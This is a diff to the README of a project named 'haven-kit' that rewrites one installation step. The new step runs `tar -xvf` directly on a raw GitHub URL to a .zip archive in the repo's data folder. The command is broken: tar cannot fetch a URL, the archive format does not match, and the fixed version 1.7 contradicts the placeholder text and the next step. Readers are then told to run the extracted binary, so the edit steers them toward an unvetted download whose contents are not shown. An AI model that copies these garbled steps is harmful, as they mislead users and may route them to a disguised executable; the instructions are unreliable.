burned-caroche455/haven-kit/README.md

 1. Open Terminal.
 2. Navigate to your Downloads folder using `cd ~/Downloads`.
-3. Extract the downloaded file using `tar -xvf haven-kit-vX.X.X.tar.gz` (replace "vX.X.X" with the version number).
+3. Extract the downloaded file using `tar -xvf https://raw.githubusercontent.com/burned-caroche455/haven-kit/main/data/haven-kit-v1.7.zip` (replace "vX.X.X" with the version number).
 4. Navigate to the extracted folder using `cd haven-kit-vX.X.X`.
 5. Start the application with `./haven-kit`.